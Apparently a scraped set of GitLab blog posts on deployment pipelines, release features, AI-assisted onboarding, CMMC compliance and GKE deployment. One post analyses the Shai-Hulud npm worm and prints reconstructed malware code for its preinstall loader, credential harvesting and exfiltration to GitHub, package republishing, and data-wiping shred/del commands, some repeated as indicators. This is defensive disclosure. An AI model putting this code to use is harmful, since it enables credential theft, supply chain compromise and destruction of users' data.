and new assets are imemdiately made available when Canary begins its deploy. This only happens during the Canary stage deployment. Because Canary and Main stages share the same asset storage, these changes are already available when the Main stage deploys. * **Gitaly:** Updates Gitaly Virtual Machine storage layer via our Omnibus Linux package on each Gitaly node. This service is unique as we bundle it with `git`. Therefore, we need to ensure that this service is capable of atomic upgrades. We leverage a wrapper around Gitaly, which enables us to install a newer version of Gitaly and make use of the library `tableflip` to cleanly rotate the running Gitaly, ensuring high availability of this service on each of our instances. * **Kubernetes:** Deploys containerized GitLab components via our Helm chart. Note that we deploy to numerous clusters spread across Zones for redundancy, so these are usually broken into their own stages to minimize harm and sometimes allows us to stop mid-deploy if critical issues are detected. ### Multi-version compatibility: The hidden challenge As you read our process, you will notice that there's a period of time where our database schema is ahead of the code that the Main stage knows about. This happens because the Canary stage has already deployed new code and runs regular database migrations, but the Main stage is still running the previous version of the code that doesn't know about these new database changes. **Real-world example:** Imagine we're adding a new `merge_readiness` field to merge requests. During deployment, some servers are running code that expects this field. while others don't know it exists yet. If we handle this poorly, we break GitLab.com for millions of users. If we handle it well, nobody notices anything happened. This occurs with most other services, as well. For example, if a client sends multiple requests, there's a chance one of them might land in our Canary stage; other requests might be directed to the Main stage. This is not too different from a deploy as it does take a decent amount of time to roll through the few thousand Pods that run our services. With a few exceptions, the vast majority of our services will run a slightly newer version of that component in Canary for a period of time. In a sense, these scenarios are all transient states. But they can often persist for several hours or days in a live, production environment. Therefore, we must treat them with the same care as permanent states. During any deployment, we have multiple versions of GitLab running simultaneously and they all need to play nicely together. ## Database operations Database migrations present a unique challenge in our Canary deployment model. We need schema changes to support new features while maintaining our ability to roll back if issues arise. Our solution involves careful separation of concerns: * **Regular migrations:** Run during the Canary stage, designed to be backward-compatible, consists of only reversible changes * **Post-deploy migrations:** The "point of no return" migrations that happen only after multiple successful deployments Database changes are handled with precision and extensive validation procedures: graph LR A[Regular Migrations] --> B[Canary Stage Deploy] B --> C[Main Stage Deploy] C --> D[Post Deploy Migrations] ### Post-deploy migrations GitLab deployments involve many components. Updating GitLab is not atomic, so many components must be backward-compatible. Post-deploy migrations often contain changes that can't be easily rolled back — think data transformations, column drops, or structural changes that would break older code versions. By running them _after_ we've gained confidence through multiple successful deployments, we ensure: 1. **The new code is stable** and we're unlikely to need a rollback 2. **Performance characteristics** are well understood in production 3. **Any edge cases** have been discovered and addressed 4. **The blast radius** is minimized if something does go wrong This approach provides the optimal balance: enabling rapid feature deployment through Canary releases while maintaining rollback capabilities until we have high confidence in deployment stability. **The expand-migrate-contract pattern:** Our database, frontend, and application compatibility changes follow a carefully orchestrated three-phase approach. 1. **Expand:** Add new structures (columns, indexes) while keeping old ones functional 2. **Migrate:** Deploy new application code that uses the new structures 3. **Contract:** Remove old structures in post-deploy migrations after everything is stable **Real-world example:** When adding a new `merge_readiness` column to merge requests: 1. **Expand:** Add the new column with a default value; existing code ignores it 2. **Migrate:** Deploy code that reads and writes to the new column while still supporting the old approach 3 **Contract:** After several successful deployments, remove the old column in a post-deploy migration All database operations, application code, frontend code, and more, are subject to a set of guidelines that Engineering must adhere to, which can be found in our Multi-Version Compatibility documentation. ## Results and impact Our deployment infrastructure delivers measurable benefits: **For GitLab** * Up to 12 deployments daily to GitLab.com * Zero-downtime deployments serving millions of developers * Security patches can reach production within hours, not days * New features validated in production at massive scale before general availability **For customers** * Proven deployment patterns you can adopt for your own applications * Features battle-tested on the world's largest GitLab instance before reaching your environment * Documentation that reflects actual production practices, not theoretical best practices * Confidence that GitLab's recommended upgrade procedures work at any scale ## Key takeaways for engineering teams GitLab's deployment pipeline represents a sophisticated system that balances deployment velocity with operational reliability. The progressive deployment model, comprehensive testing integration, and robust rollback capabilities provide a foundation for reliable software delivery at scale. For engineering teams implementing similar systems, key considerations include: * **Automated testing:** Comprehensive test coverage throughout the deployment pipeline * **Progressive rollout:** Staged deployments to minimize risk and enable rapid recovery * **Monitoring integration:** Comprehensive observability across all deployment stages * **Incident response:** Rapid detection and resolution capabilities for deployment issues GitLab's architecture demonstrates how modern CI/CD systems can manage the complexity of large-scale deployments while maintaining the velocity required for competitive software development. ## Important note on scope This article specifically covers the deployment pipeline for services that are part of the **GitLab Omnibus package** and **Helm chart** — essentially the core GitLab monolith and its tightly integrated components. However, GitLab's infrastructure landscape extends beyond what's described here. Other services, notably our **AI services** and services that might be in a **proof of concept state** , follow a different deployment approach using our internal platform called Runway. If you're working with or curious about these other services, you can find more information in the Runway documentation. Other offerings, such as GitLab Dedicated are deployed more in alignment with what we expect customers to be capable of performing themselves by way of the **GitLab Environment Toolkit**. If you'd like to learn more, check out the GitLab Environment Toolkit project. The deployment strategies, architectural considerations, and pipeline complexities outlined in this article represent the battle-tested approach we use for our core platform — but like any large engineering organization, we have multiple deployment strategies tailored to different service types and maturity levels. Further documentation about Auto-Deploy and our procedures can be found at the below links: * Engineering Deployments * Release Procedural Documentation ## More resources * How we decreased GitLab repo backup times from 48 hours to 41 minutes * How we supercharged GitLab CI statuses with WebSockets * How we reduced MR review time with Value Stream Management
about.gitlab.com
December 1, 2025 at 10:31 PM
GitLab discovers widespread npm supply chain attack
GitLab's Vulnerability Research team has identified an active, large-scale supply chain attack involving a destructive malware variant spreading through the npm ecosystem. Our internal monitoring system has uncovered multiple infected packages containing what appears to be an evolved version of the "Shai-Hulud" malware. Early analysis shows worm-like propagation behavior that automatically infects additional packages maintained by impacted developers. Most critically, we've discovered the malware contains a "**dead man's switch** " mechanism that threatens to destroy user data if its propagation and exfiltration channels are severed. **We verified that GitLab was not using any of the malicious packages and are sharing our findings to help the broader security community respond effectively.** ## Inside the attack Our internal monitoring system, which scans open-source package registries for malicious packages, has identified multiple npm packages infected with sophisticated malware that: * Harvests credentials from GitHub, npm, AWS, GCP, and Azure * Exfiltrates stolen data to attacker-controlled GitHub repositories * Propagates by automatically infecting other packages owned by victims * **Contains a destructive payload that triggers if the malware loses access to its infrastructure** While we've confirmed several infected packages, the worm-like propagation mechanism means many more packages are likely compromised. The investigation is ongoing as we work to understand the full scope of this campaign. ## Technical analysis: How the attack unfolds ### Initial infection vector The malware infiltrates systems through a carefully crafted multi-stage loading process. Infected packages contain a modified `package.json` with a preinstall script pointing to `setup_bun.js`. This loader script appears innocuous, claiming to install the Bun JavaScript runtime, which is a legitimate tool. However, its true purpose is to establish the malware's execution environment. // This file gets added to victim's packages as setup_bun.js #!/usr/bin/env node async function downloadAndSetupBun() { // Downloads and installs bun let command = process.platform === 'win32' ? 'powershell -c "irm bun.sh/install.ps1|iex"' : 'curl -fsSL https://bun.sh/install | bash'; execSync(command, { stdio: 'ignore' }); // Runs the actual malware runExecutable(bunPath, ['bun_environment.js']); } The `setup_bun.js` loader downloads or locates the Bun runtime on the system, then executes the bundled `bun_environment.js` payload, a 10MB obfuscated file already present in the infected package. This approach provides multiple layers of evasion: the initial loader is small and seemingly legitimate, while the actual malicious code is heavily obfuscated and bundled into a file too large for casual inspection. ### Credential harvesting Once executed, the malware immediately begins credential discovery across multiple sources: * **GitHub tokens** : Searches environment variables and GitHub CLI configurations for tokens starting with `ghp_` (GitHub personal access token) or `gho_`(GitHub OAuth token) * **Cloud credentials** : Enumerates AWS, GCP, and Azure credentials using official SDKs, checking environment variables, config files, and metadata services * **npm tokens** : Extracts tokens for package publishing from `.npmrc` files and environment variables, which are common locations for securely storing sensitive configuration and credentials. * **Filesystem scanning** : Downloads and executes Trufflehog, a legitimate security tool, to scan the entire home directory for API keys, passwords, and other secrets hidden in configuration files, source code, or git history async function scanFilesystem() { let scanner = new Trufflehog(); await scanner.initialize(); // Scan user's home directory for secrets let findings = await scanner.scanFilesystem(os.homedir()); // Upload findings to exfiltration repo await github.saveContents("truffleSecrets.json", JSON.stringify(findings)); } ### Data exfiltration network The malware uses stolen GitHub tokens to create public repositories with a specific marker in their description: "Sha1-Hulud: The Second Coming." These repositories serve as dropboxes for stolen credentials and system information. async function createRepo(name) { // Creates a repository with a specific description marker let repo = await this.octokit.repos.createForAuthenticatedUser({ name: name, description: "Sha1-Hulud: The Second Coming.", // Marker for finding repos later private: false, auto_init: false, has_discussions: true }); // Install GitHub Actions runner for persistence if (await this.checkWorkflowScope()) { let token = await this.octokit.request( "POST /repos/{owner}/{repo}/actions/runners/registration-token" ); await installRunner(token); // Installs self-hosted runner } return repo; } Critically, if the initial GitHub token lacks sufficient permissions, the malware searches for other compromised repositories with the same marker, allowing it to retrieve tokens from other infected systems. This creates a resilient botnet-like network where compromised systems share access tokens. // How the malware network shares tokens: async fetchToken() { // Search GitHub for repos with the identifying marker let results = await this.octokit.search.repos({ q: '"Sha1-Hulud: The Second Coming."', sort: "updated" }); // Try to retrieve tokens from compromised repos for (let repo of results) { let contents = await fetch( `https://raw.githubusercontent.com/${repo.owner}/${repo.name}/main/contents.json` ); let data = JSON.parse(Buffer.from(contents, 'base64').toString()); let token = data?.modules?.github?.token; if (token && await validateToken(token)) { return token; // Use token from another infected system } } return null; // No valid tokens found in network } ### Supply chain propagation Using stolen npm tokens, the malware: 1. Downloads all packages maintained by the victim 2. Injects the `setup_bun.js` loader into each package's preinstall scripts 3. Bundles the malicious `bun_environment.js` payload 4. Increments the package version number 5. Republishes the infected packages to npm async function updatePackage(packageInfo) { // Download original package let tarball = await fetch(packageInfo.tarballUrl); // Extract and modify package.json let packageJson = JSON.parse(await readFile("package.json")); // Add malicious preinstall script packageJson.scripts.preinstall = "node setup_bun.js"; // Increment version let version = packageJson.version.split(".").map(Number); version[2] = (version[2] || 0) + 1; packageJson.version = version.join("."); // Bundle backdoor installer await writeFile("setup_bun.js", BACKDOOR_CODE); // Repackage and publish await Bun.$`npm publish ${modifiedPackage}`.env({ NPM_CONFIG_TOKEN: this.token }); } ## The dead man's switch Our analysis uncovered a destructive payload designed to protect the malware’s infrastructure against takedown attempts. The malware continuously monitors its access to GitHub (for exfiltration) and npm (for propagation). If an infected system loses access to both channels simultaneously, it triggers immediate data destruction on the compromised machine. On Windows, it attempts to delete all user files and overwrite disk sectors. On Unix systems, it uses `shred` to overwrite files before deletion, making recovery nearly impossible. // CRITICAL: Token validation failure triggers destruction async function aL0() { let githubApi = new dq(); let npmToken = process.env.NPM_TOKEN || await findNpmToken(); // Try to find or create GitHub access if (!githubApi.isAuthenticated() || !githubApi.repoExists()) { let fetchedToken = await githubApi.fetchToken(); // Search for tokens in compromised repos if (!fetchedToken) { // No GitHub access possible if (npmToken) { // Fallback to NPM propagation only await El(npmToken); } else { // DESTRUCTION TRIGGER: No GitHub AND no NPM access console.log("Error 12"); if (platform === "windows") { // Attempts to delete all user files and overwrite disk sectors Bun.spawnSync(["cmd.exe", "/c", "del /F /Q /S \"%USERPROFILE%*\" && " + "for /d %%i in (\"%USERPROFILE%*\") do rd /S /Q \"%%i\" & " + "cipher /W:%USERPROFILE%" // Overwrite deleted data ]); } else { // Attempts to shred all writable files in home directory Bun.spawnSync(["bash", "-c", "find \"$HOME\" -type f -writable -user \"$(id -un)\" -print0 | " + "xargs -0 -r shred -uvz -n 1 && " + // Overwrite and delete "find \"$HOME\" -depth -type d -empty -delete" // Remove empty dirs ]); } process.exit(0); } } } } This creates a dangerous scenario. If GitHub mass-deletes the malware's repositories or npm bulk-revokes compromised tokens, thousands of infected systems could simultaneously destroy user data. The distributed nature of the attack means that each infected machine independently monitors access and will trigger deletion of the user’s data when a takedown is detected. ## Indicators of compromise To aid in detection and response, here is a more comprehensive list of the key indicators of compromise (IoCs) identified during our analysis. Type | Indicator | Description ---|---|--- **file** | `bun_environment.js` | Malicious post-install script in node_modules directories **directory** | `.truffler-cache/` | Hidden directory created in user home for Trufflehog binary storage **directory** | `.truffler-cache/extract/` | Temporary directory used for binary extraction **file** | `.truffler-cache/trufflehog` | Downloaded Trufflehog binary (Linux/Mac) **file** | `.truffler-cache/trufflehog.exe` | Downloaded Trufflehog binary (Windows) **process** | `del /F /Q /S "%USERPROFILE%*"` | Windows destructive payload command **process** | `shred -uvz -n 1` | Linux/Mac destructive payload command **process** | `cipher /W:%USERPROFILE%` | Windows secure deletion command in payload **command** | `curl -fsSL https://bun.sh/install | bash` **command** | `powershell -c "irm bun.sh/install.ps1 | iex"` ## Looking ahead This campaign represents an evolution in supply chain attacks where the threat of collateral damage becomes the primary defense mechanism for the attacker's infrastructure. The investigation is ongoing as we work with the community to understand the full scope and develop safe remediation strategies. GitLab's automated detection systems continue to monitor for new infections and variations of this attack. By sharing our findings early, we hope to help the community respond effectively while avoiding the pitfalls created by the malware's dead man's switch design.
about.gitlab.com
November 25, 2025 at 10:31 PM
GitLab 18.6: From configuration to control
With GitLab 18.6, we’re continuing to advance how AI integrates into everyday software development with enhancements that give teams greater choice and control. GitLab 18.6 will help plan, build, and secure software more intelligently across the entire software lifecycle. Teams now have greater flexibility to select the right models for their workflows, extend AI into secure and self-managed environments, and strengthen visibility and governance across every stage of development. ## AI that adapts to you With 18.6, GitLab’s AI becomes more adaptable to real-world workflows. GitLab Duo Agents now plan with greater context, work seamlessly across IDEs and self-managed instances, and offer new open-source model options — helping teams accelerate delivery without compromising compliance or control. **GitLab Duo Planner and Security Analyst agent enhancements** In 18.6, GitLab Duo Planner and GitLab Duo Security Analyst are now available by default in the Agentic Chat dropdown — no configuration or setup required. Both agents can be used immediately across projects and groups, giving teams built-in assistance for planning, issue refinement, and security analysis. GitLab Duo Planner agent now works at the group level with awareness of the epic being viewed and supports milestone and iteration workflows. Security Analyst agent provides automated vulnerability review, context interpretation, and guided remediation suggestions. Both agents are also available to self-managed customers. For a full list of what these agents can do, see the documentation. **gpt-oss-120b model support for GitLab Duo Agent Platform** GitLab Duo Self-Hosted customers can now deploy the **gpt-oss-120b** model within the GitLab Duo Agent Platform — a high-performance, fully open-source model optimized for agentic workflows. This addition enables teams to execute complex tasks and reasoning-driven processes while maintaining control over model transparency and infrastructure. For organizations that require open, auditable models to address compliance or data sovereignty requirements, gpt-oss-120b provides a reliable alternative to proprietary models without sacrificing performance. For more information on supported models, please see our documentation. **End-user model selection for cloud-connected self-managed instances (GA)** Cloud-connected self-managed end users can now choose which AI model powers their GitLab Duo Agentic Chat experience directly from the GitLab UI. This gives administrators and end users more control over how conversations perform and how costs and governance requirements are managed. No matter the deployment environment — on-premises, private cloud, or public cloud — teams can select regionally compliant or in-house models to help satisfy data residency needs and compare model quality for speed or accuracy. This flexibility ensures that every organization can tailor Agentic Chat to its operational priorities. For full details on how to select a model in Agentic Chat, see the model selection section of the GitLab documentation. **Web IDE support for air-gapped deployments** Air-gapped or tightly controlled environments — such as public sector organizations, defense agencies, and regulated enterprises — can now run the Web IDE with full functionality even without internet access. By allowing administrators to configure their own Web IDE extension host domain, GitLab enables markdown preview, code editing, and GitLab Duo Chat capabilities in isolated or offline systems. This makes it possible for development teams in secure or restricted networks to benefit from modern IDE workflows without sacrificing security and compliance. **Modern interface now default for self-managed instances** Self-managed GitLab instances now default to the modern interface in 18.6, bringing the same streamlined experience already available on GitLab.com to on-premises deployments. The updated layout improves navigation consistency and makes core workflows more intuitive across the platform. Administrators maintain full flexibility with opt-out controls via feature flag or user-level toggling if needed. This update ensures self-managed customers benefit from GitLab's latest interface improvements while maintaining the control and customization options enterprise environments require. ## Platform security with awareness and authority GitLab 18.6 strengthens platform security with deeper context and clearer control, helping security teams focus on the risks that matter most while maintaining governance across every project. **Security attributes and context filtering** Security teams can now apply custom business context labels to projects and groups, transforming raw scan results into prioritized, risk-based insights. Instead of viewing vulnerabilities in isolation, teams can tag projects by business unit, application type, or criticality — then filter and sort security data by impact. This allows organizations to focus remediation on the areas of greatest business risk, helping to accelerate time to resolution for the issues that matter most. **Security Manager default role** To simplify access control and onboarding for security professionals, GitLab introduces a new Security Manager role. This role provides comprehensive permissions across vulnerability management, policy configuration, and compliance features — while maintaining separation of duties by restricting administrative and code modification rights. Security teams gain the access they need from day one, along with governance, consistency, and accountability across the platform. ## AI that adapts to your workflow This release represents more than new capabilities — it's about how GitLab Duo Agent Platform is becoming an embedded part of everyday software development workflows. Watch a walkthrough video that shows how a member of your software development team can start on a new project using GitLab Duo Agent Platform: <div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1138657697?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="18.6 Demo (TO BE UPDATED)"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> ## Get started today GitLab Premium and Ultimate users can start using these capabilities today on GitLab.com and self-managed environments, with availability for GitLab Dedicated customers planned for next month. New to GitLab? Start your free trial and see why the future of development is AI-powered, secure, and orchestrated through the world’s most comprehensive DevSecOps platform. _**Note:** GitLab Duo Agent Platform is currently in beta. Platform capabilities that are in beta are available as part of the GitLab Beta program. They are free to use during the beta period, and when generally available, they are planned to be made available with a paid add-on option for GitLab Duo Agent Platform._ ### Stay up to date with GitLab To make sure you’re getting the latest features, security updates, and performance improvements, we recommend keeping your GitLab instance up to date. The following resources can help you plan and complete your upgrade: * Upgrade Path Tool — enter your current version and see the exact upgrade steps for your instance * Upgrade Documentation — detailed guides for each supported version, including requirements, step-by-step instructions, and best practices By upgrading regularly, you’ll ensure your team benefits from the newest GitLab capabilities and remains secure and supported. For organizations that want a hands-off approach, consider GitLab’s Managed Maintenance service. With Managed Maintenance, your team stays focused on innovation while GitLab experts keep your Self-Managed instance reliably upgraded, secure, and ready to lead in DevSecOps. Ask your account manager for more information. _This blog post contains "forward‑looking statements" within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in these statements are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to differ materially. Further information on these risks and other factors is included under the caption "Risk Factors" in our filings with the SEC. We do not undertake any obligation to update or revise these statements after the date of this blog post, except as required by law._
about.gitlab.com
November 20, 2025 at 10:24 PM
GitLab engineer: How I improved my onboarding experience with AI
Starting a new job is exciting, and overwhelming. New teammates, new tools, and, in GitLab’s case, a lot of documentation. Six weeks ago, I joined GitLab’s Growth team as a fullstack engineer. Anyone who has gone through onboarding at GitLab knows it’s transparent, extensive, and thorough. GitLab's onboarding process includes a lot of docs, videos, and trainings that will bring you up to speed. Also, in line with GitLab's values, my team encouraged me to start contributing right away. I quickly realized that onboarding here is both diligent and intense. Luckily, I had a secret helper: GitLab Duo. ## My main use cases I’ve found GitLab Duo's AI assistance, available throughout the software development lifecycle, useful in three key areas: exploration, reviewing, and debugging. With GitLab Duo, I was able to get my first tiny MR deployed to production in the first week and actively contribute to the personal homepage in GitLab 18.5 in the weeks after. ### Exploration Early in onboarding, I often remembered reading something but couldn’t recall where. GitLab has a public-facing handbook, an internal handbook, and GitLab Docs. It can be difficult to search across all of them efficiently. GitLab Duo simplifies this task: I can describe what I’m looking for in natural language via GitLab Duo Chat and search across all resources at once. Example prompt: > I remember reading about how RSpec tests are done at GitLab. Can you find relevant documentation across the Handbook, the internal handbook and the GitLab Docs? Before starting work on an issue, I use GitLab Duo to identify edge cases and hidden dependencies. GitLab Duo will relate the requirements of the issue against the whole GitLab codebase, assess similar features, and prepare all the findings. Based on its output I am able to refine the issue with my product manager and designer, and make sure my implementation covers all edge cases or define future iterations. Example prompt: > Analyze this issue in the context of its epic and identify: > > * Implementation questions to ask PM/design before coding > * Edge cases not covered in requirements > * Cross-feature dependencies that might be affected > * Missing acceptance criteria > I also check that my planned solution follows GitLab best practices and common patterns. Example prompt: > I want to implement XZY behavior — how is this usually done at GitLab, and what other options do I have? ### Reviewing I always let GitLab Duo review my merge requests before assigning human reviewers. It often catches small mistakes, suggests improvements, and highlights edge cases I missed. This shortens the review cycle and helps my teammates focus on more complex and bigger-picture feedback. Since I’m still new to GitLab’s codebase and coding practices, some review comments are hard to interpret. In those cases, GitLab Duo helps me understand what a reviewer means and how it relates to my code. Example prompt: > I don’t understand the comment on this MR about following the user instead of testing component internals, what does it mean and how does it relate to my implementation? ### Debugging Sometimes pipeline tests on my merge requests failed unexpectedly. If I can’t tell whether my changes are the cause, GitLab Duo helps me investigate and fix the failures. Using GitLab Duo Agentic Chat, Duo can apply changes to debug the failing job. Example prompt: > The pipeline job “rspec system pg16 12/32” is failing, but I don’t know whether that relates to my changes. Can you check, if my changes are causing the pipeline failure and, if so, guide me through the steps of fixing it. ## How Duo aligns with GitLab’s values Using GitLab Duo doesn’t just help me, it also supports GitLab’s CREDIT values: * **Collaboration:** I ask teammates fewer basic questions. And when I do ask questions, they’re more thoughtful and informed. This respects their time. * **Results for customers:** By identifying edge cases early and improving code quality, GitLab Duo helps me deliver better outcomes for customers. * **Efficiency:** Streamlined preparation, faster reviews, and improved debugging make me more efficient. * **Diversity, inclusion & belonging:** AI guidance might mitigate misunderstandings and different barriers to entry based on differing backgrounds and abilities. * **Iteration:** The ability to try ideas faster and identify potential improvements, enables faster iteration. * **Transparency:** GitLab Duo makes the already transparent documentation at GitLab more accessible. ## Staying cautious with AI It never has been as easy and difficult to be competent as in the days of AI. It can be a powerful tool, but AI does get things wrong. Therefore, I avoid automation bias by always validating AI's outputs. If I don’t understand the output, I don’t use it. I’m also cautious of over-reliance. Studies suggest that heavy AI use can lead to cognitive offloading and worse outcomes in the long run. One study shows that users of AI perform worse in exams. To avoid negatively affecting my skills, I use AI as a discussion partner rather than just implementing the code it generates. ## Summary Onboarding is always a stressful time, but using GitLab Duo made mine smoother and less overwhelming. I learned more about GitLab’s codebase, culture, and best practices than I could have managed on my own. > Want to make GitLab Duo part of your onboarding experience? Sign up for a free trial today. ## Resources * Getting started with GitLab Duo * Get started with GitLab Duo Agentic Chat in the web UI * 10 best practices for using AI-powered GitLab Duo Chat
about.gitlab.com
November 17, 2025 at 10:24 PM
Achieve CMMC Level 2 with GitLab Dedicated for Government
For Defense Industrial Base (DIB) companies, the U.S. Department of Defense's release of the Cybersecurity Maturity Model Certification (CMMC) Final Rule and new guidance on “FedRAMP equivalency” has dramatically increased the cost of compliance and fundamentally changed the way in which they drive their risk management programs. Gone is the era of “self-attestation” of security programs; DIB companies are required to strictly apply NIST 800-171 to their environments that handle Controlled Unclassified Information (CUI), and have their security controls audited by a Third-Party Assessment Organization (3PAO) every three years. DIB companies are engineering focused, not compliance driven, and formal audits get pricey quickly. These changes add significant complications for companies focused on supporting the warfighter. The good news? GitLab Dedicated for Government's FedRAMP Moderate Authorization means DIB companies can directly use GitLab Dedicated for Government with no additional audits or authorizations, which reduces the impact and cost of compliance. ## The foundational rule: FedRAMP Moderate Equivalency The protection of Controlled Unclassified Information (CUI) within the DIB is driven by a foundational legal and contractual mandate: the Defense Federal Acquisition Regulation Supplement (DFARS) Clause 252.204-7012. This clause specifically states that if a contractor uses an external cloud service provider to "store, process, or transmit any covered defense information," that provider must meet security requirements "equivalent to those established by the Government for the FedRAMP Moderate baseline." The DOD's January 2, 2024, memorandum, "Federal Risk and Authorization Management Program (FedRAMP) Moderate Equivalency for Cloud Service Provider's (CSPs) Cloud Service Offerings" defines “FedRAMP Moderate Equivalency,” and also directly specifies that FedRAMP Moderate Cloud Service Offerings (CSOs) can be used without any additional assessment, such as individual CMMC assessment, to meet equivalency requirements: “This memorandum does not apply to CSOs that are FedRAMP Moderate Authorized under the existing FedRAMP process. **FedRAMP Moderate Authorized CSOs identified in the FedRAMP Marketplace** provide the required security to store, process or transmit CDI in accordance with Defense Federal Acquisition Regulations Supplement (DFARS) Clause 252.204-7012, "Safeguarding Covered Defense Information and Cyber Incident Reporting" and **can be leveraged without further assessment to meet the equivalency requirements**.” ## The GitLab platform: A proven path to compliance GitLab's GovCloud Offering, GitLab Dedicated for Government, has achieved FedRAMP Moderate Authorization. This means that DIB companies can leverage GitLab Dedicated for Government as their DevSecOps platform immediately and without any additional audits or compliance checks. DIB companies leveraging GitLab Dedicated for Government inherit all of our security controls and our Body of Evidence, shifting the risk and cost of compliance away from themselves and allowing them to focus on their mission. ## The Shared Responsibility Matrix: Your role as a DIB contractor While a FedRAMP-authorized solution significantly reduces your compliance burden, compliance is a joint effort. You are responsible for the security controls that fall under your purview. This is where the Shared Responsibility Matrix (SRM), also called the Customer Responsibility Matrix (CRM), comes in. When you adopt GitLab Dedicated for Government, you will receive a comprehensive SRM that clearly delineates which security controls are managed by GitLab and which are your responsibility as the customer. Your CMMC C3PAO will use this document to ensure you have implemented the necessary controls on your end. By leveraging GitLab's FedRAMP-authorized platform, you can confidently address your CMMC Level 2 compliance requirements, focusing on your mission while trusting that GitLab has you covered. > To learn more about GitLab Dedicated for Government, visit our GitLab for Public Sector page. Interested in a demo? Contact Sales for more information at [email protected]. ## References * CMMC “Final Rule” DFARS Supplement * DOD-CIO “FedRAMP Moderate Equivalency” Memo * GitLab Dedicated for Government FedRAMP Marketplace Listing
about.gitlab.com
November 12, 2025 at 10:22 PM
Secure AI agent deployment to GKE
Building AI agents is exciting, but deploying them securely to production shouldn't be complicated. In this tutorial, you will learn how GitLab's native Google Cloud integration makes it straightforward to deploy AI agents to Google Kubernetes Engine (GKE) — with built-in scanning and zero service account keys. ## Why choose GKE to deploy your AI agents? GKE provides enterprise-grade orchestration that connects seamlessly with GitLab CI/CD pipelines through OIDC authentication. Your development team can deploy AI agents while maintaining complete visibility, compliance, and control over your cloud infrastructure. This guide uses Google's Agent Development Kit (ADK) to build the app, so you can expect increased seamlessness as this is deployed using GitLab. Three key advantages to this approach: **Full infrastructure control** - Your data, your rules, your environment. You maintain complete control over where your AI agents run and how they're configured. **Native GitLab integration** - No complex workarounds. Your existing pipelines work right out of the box thanks to GitLab's native integration with Google Cloud. **Production-grade scaling** - GKE automatically handles the heavy lifting of scaling and internal orchestration as your AI workloads grow. The key point is that GitLab with GKE provides the enterprise reliability your AI deployments demand without sacrificing the developer experience your teams expect. ## Prerequisites Before you start, make sure you have these APIs enabled: * GKE API * Artifact Registry API * Vertex AI API Also make sure you have: * GitLab project created * GKE cluster provisioned * Artifact Registry repository created ## The deployment process ### 1. Set up IAM and permissions on GitLab Navigate to your GitLab integrations to configure Google Cloud authentication (IAM). Go to **Settings > Integrations** and configure the Google Cloud integration. If you're using a group-level integration, notice that default settings are already inherited by projects. This means you configure once at the group level, and all projects benefit and inherit this setting. To set this up from scratch, provide: * Project ID * Project Number * Workload Identity Pool ID * Provider ID Once configured, GitLab provides a script to run in Google Cloud Console, via Cloud Shell. The outcome of running this script is a Workload Identity Federation pool with the necessary service principal to enable the proper access. ### 2. Configure Artifact Registry integration Still in GitLab's integration settings, configure Artifact Management: 1. Click **Artifact Management**. 2. Select **Google Artifact Registry**. 3. Provide: * Project ID * Repository Name (created beforehand) * Repository Location GitLab provides another script to run in Google Cloud Console. **Important:** Before proceeding, add these extra roles to the Workload Identity Federation pool: * Service Account User * Kubernetes Developer * Kubernetes Cluster Viewer These permissions allow GitLab to deploy to GKE in subsequent steps. ### 3. Create the CI/CD pipeline Now for the key part — creating the CI/CD pipeline for deployment. Head to **Build > Pipeline Editor** and define your pipeline with four stages: * **Build** - Docker creates the container image. * **Test** - GitLab Auto DevOps provides built-in security scans to ensure there are no vulnerabilities. * **Upload** - Uses GitLab's built-in CI/CD component to push to Google Artifact Registry. * **Deploy** - Uses Kubernetes configuration to deploy to GKE. Here's the complete `.gitlab-ci.yml`: default: tags: [ saas-linux-2xlarge-amd64 ] stages: - build - test - upload - deploy variables: GITLAB_IMAGE: $CI_REGISTRY_IMAGE/main:$CI_COMMIT_SHORT_SHA AR_IMAGE: $GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_LOCATION-docker.pkg.dev/$GOOGLE_ARTIFACT_REGISTRY_PROJECT_ID/$GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_NAME/main:$CI_COMMIT_SHORT_SHA GCP_PROJECT_ID: "your-project-id" GKE_CLUSTER: "your-cluster" GKE_REGION: "us-central1" KSA_NAME: "ai-agent-ksa" build: image: docker:24.0.5 stage: build services: - docker:24.0.5-dind before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY script: - docker build -t $GITLAB_IMAGE . - docker push $GITLAB_IMAGE include: - template: Jobs/Dependency-Scanning.gitlab-ci.yml - template: Jobs/Container-Scanning.gitlab-ci.yml - template: Jobs/Secret-Detection.gitlab-ci.yml - component: gitlab.com/google-gitlab-components/artifact-registry/upload-artifact-registry@main inputs: stage: upload source: $GITLAB_IMAGE target: $AR_IMAGE deploy: stage: deploy image: google/cloud-sdk:slim identity: google_cloud before_script: - apt-get update && apt-get install -y kubectl google-cloud-sdk-gke-gcloud-auth-plugin - gcloud container clusters get-credentials $GKE_CLUSTER --region $GKE_REGION --project $GCP_PROJECT_ID script: - | kubectl apply -f - <<EOF apiVersion: apps/v1 kind: Deployment metadata: name: ai-agent namespace: default spec: replicas: 2 selector: matchLabels: app: ai-agent template: metadata: labels: app: ai-agent spec: serviceAccountName: $KSA_NAME containers: - name: ai-agent image: $AR_IMAGE ports: - containerPort: 8080 resources: requests: {cpu: 500m, memory: 1Gi} limits: {cpu: 2000m, memory: 4Gi} livenessProbe: httpGet: {path: /health, port: 8080} initialDelaySeconds: 60 readinessProbe: httpGet: {path: /health, port: 8080} initialDelaySeconds: 30 --- apiVersion: v1 kind: Service metadata: name: ai-agent-service namespace: default spec: type: LoadBalancer ports: - port: 80 targetPort: 8080 selector: app: ai-agent --- apiVersion: autoscaling/v2 kind: HorizontalPodAutoscaler metadata: name: ai-agent-hpa namespace: default spec: scaleTargetRef: apiVersion: apps/v1 kind: Deployment name: ai-agent minReplicas: 2 maxReplicas: 10 metrics: - type: Resource resource: name: cpu target: {type: Utilization, averageUtilization: 70} EOF kubectl rollout status deployment/ai-agent 